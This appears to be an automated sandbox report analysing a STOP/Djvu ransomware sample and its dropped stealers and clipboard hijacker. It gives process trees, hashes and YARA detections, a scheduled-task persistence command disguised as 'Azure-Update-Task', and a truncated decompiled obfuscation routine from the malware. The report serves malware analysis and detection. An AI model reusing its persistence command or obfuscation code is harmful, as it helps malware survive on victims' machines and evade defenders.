JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 5900, Parent PID: 3324

General

Target ID:	7
Start time:	00:22:23
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: build2.exePID: 1544, Parent PID: 6132

General

Target ID:	8
Start time:	00:22:24
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Imagebase:	0x400000
File size:	264192 bytes
MD5 hash:	B9212DED69FAE1FA1FB5D6DB46A9FB76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.350956103.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.349827384.00000000004B9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 4296, Parent PID: 5900

General

Target ID:	9
Start time:	00:22:26
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: build2.exePID: 5364, Parent PID: 1544

General

Target ID:	10
Start time:	00:22:27
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Imagebase:	0x400000
File size:	264192 bytes
MD5 hash:	B9212DED69FAE1FA1FB5D6DB46A9FB76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000000.378213612.0000000000627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: build3.exePID: 5972, Parent PID: 6132

General

Target ID:	11
Start time:	00:22:28
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"
Imagebase:	0xb90000
File size:	9728 bytes
MD5 hash:	9EAD10C08E72AE41921191F8DB39BC16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5880, Parent PID: 5972

General

Target ID:	12
Start time:	00:22:28
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Imagebase:	0x340000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5968, Parent PID: 5880

General

Target ID:	13
Start time:	00:22:28
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: mstsca.exePID: 4536, Parent PID: 1084

General

Target ID:	14
Start time:	00:22:28
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Imagebase:	0xee0000
File size:	9728 bytes
MD5 hash:	9EAD10C08E72AE41921191F8DB39BC16
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4612, Parent PID: 4536

General

Target ID:	15
Start time:	00:22:29
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Imagebase:	0x340000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 6096, Parent PID: 3324

General

Target ID:	16
Start time:	00:22:33
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 4756, Parent PID: 6096

General

Target ID:	17
Start time:	00:22:35
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4712, Parent PID: 4612

General

Target ID:	18
Start time:	00:22:36
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WMIADAP.exePID: 4296, Parent PID: 2156

General

Target ID:	23
Start time:	00:23:58
Start date:	30/11/2022
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff715590000
File size:	177664 bytes
MD5 hash:	9783D0765F31980950445DFD40DB15DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: U59WtZz2Sg.exePID: 5228, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	17.1%
Signature Coverage:	7.1%
Total number of Nodes:	1587
Total number of Limit Nodes:	16

Executed Functions

Function 00403607 Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 350
memorylibraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00403607(void* __edi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				long _v152;
				intOrPtr _v180;
				void _v1216;
				void* __esi;
				void* __ebp;
				intOrPtr _t350;
				intOrPtr _t358;
				void* _t393;
				void* _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t398;

				_t396 = __edi;
				_v32 = 0x78ea2189;
				_v120 = 0x4c56f655;
				_v80 = 0x67ad96c;
				_v112 = 0x511b7c29;
				_v36 = 0x7f744afb;
				_v116 = 0xbc5b5bd;
				_v12 = 0x4659ee16;
				_v132 = 0x7bc6b025;
				_v68 = 0x37837059;
				_v64 = 0x17643edc;
				_v44 = 0x21496f0;
				_v8 = 0x4990eca6;
				_v144 = 0x4f283546;
				_v92 = 0x52a213d;
				_v60 = 0x1657ccd0;
				_v48 = 0x6532eef3;
				_v20 = 0x454f0d39;
				_v140 = 0x25acdca;
				_v124 = 0x36cf089;
				_v104 = 0x589608e3;
				_v72 = 0x28d41c48;
				_v84 = 0xafaa6b9;
				_v148 = 0x3a8f33bb;
				_v96 = 0x4e61e723;
				_v28 = 0x34c30ae1;
				_v100 = 0x6c9f9b1;
				_v56 = 0x3c49d0ec;
				_v108 = 0x64326d23;
				_v40 = 0x7d1bd07a;
				_v16 = 0x609d9e1c;
				_v52 = 0x3340e30;
				_v24 = 0x54a1a0be;
				_v76 = 0x7c1cdbf;
				_v128 = 0x51555171;
				_v136 = 0x5ca8f96d;
				_v88 = 0x6ec93e52;
				_v32 = _v32 - 0x1dd541ca;
				_v32 = _v32 - 0x60b537df;
				_v32 = _v32 + 0x4427c9c4;
				_v32 = _v32 - 0x77253dc2;
				_v32 = _v32 + 0x38825e74;
				_v32 = _v32 - 0x7fae27c9;
				_v32 = _v32 - 0x79830353;
				_v32 = _v32 + 0x22dc48a9;
				_v80 = _v80 + 0x6ee70e;
				_v112 = _v112 + 0x4c637722;
				_v112 = _v112 + 0x2f6d5a07;
				_v12 = _v12 + 0x1ee609d3;
				_v116 = _v116 + 0x46256eb7;
				_v12 = _v12 + 0x52826d60;
				_v112 = _v112 + 0x2dd64314;
				_v116 = _v116 - 0x15f607e4;
				_v12 = _v12 + 0x48443f03;
				_v112 = _v112 - 0x71de80c1;
				_v12 = _v12 + 0x5f2e6438;
				_v68 = _v68 - 0x4487bb7c;
				_v32 = _v32 + 0x36dd151c;
				_v120 = _v120 + 0x54c0e364;
				_v132 = _v132 - 0x2a58babb;
				_v112 = _v112 + 0x31c2a688;
				_v32 = _v32 + 0x23855c12;
				_v116 = _v116 - 0x504654fa;
				_v80 = _v80 + 0x3dcbbe18;
				_v132 = _v132 + 0x244fd2fe;
				_v12 = _v12 + 0x54a37c2;
				_v32 = _v32 - 0x243f1809;
				_v64 = _v64 + 0x2b6767de;
				_v80 = _v80 - 0x53a65a29;
				_v120 = _v120 + 0x4c3fdb00;
				_v116 = _v116 - 0x546b4ddc;
				_v64 = _v64 - 0x8bc3fb4;
				_v132 = _v132 + 0x75e81eee;
				_v32 = _v32 - 0x4255851b;
				_v36 = _v36 + 0x6ecd6380;
				_v44 = _v44 - 0x2770fb2a;
				_v48 = _v48 + 0x2c5de5d8;
				_v92 = _v92 - 0x22fac472;
				_v144 = _v144 + 0x5a1c2bb4;
				_v132 = _v132 + 0x54d8ecaa;
				_v116 = _v116 - 0x46262e62;
				_v48 = _v48 + 0x6551053;
				_v68 = _v68 + 0x4b6fdc04;
				_v68 = _v68 + 0x3a0dbc85;
				_v80 = _v80 - 0x60a44abe;
				_v92 = _v92 - 0x616e0a07;
				_v68 = _v68 + 0xe495d63;
				_v120 = _v120 - 0x13487c76;
				_v144 = _v144 + 0x56c277e4;
				_v68 = _v68 + 0x14870e1f;
				_v140 = _v140 + 0x4c0de4af;
				_v92 = _v92 + 0x7bf4d7e8;
				_v8 = _v8 + 0x680186e;
				_v92 = _v92 - 0x3eea4219;
				_v12 = _v12 - 0xe31d955;
				_v132 = _v132 - 0x35f86dd9;
				_v132 = _v132 - 0x3dff57fa;
				_v116 = _v116 + 0x2b51c3ce;
				_v112 = _v112 + 0x1befd10f;
				_v20 = _v20 + 0x484b4049;
				_v112 = _v112 - 0x7c1ef2e2;
				_v12 = _v12 - 0x6fb81645;
				_v60 = _v60 + 0x4b608e35;
				_v20 = _v20 + 0x4b5d405c;
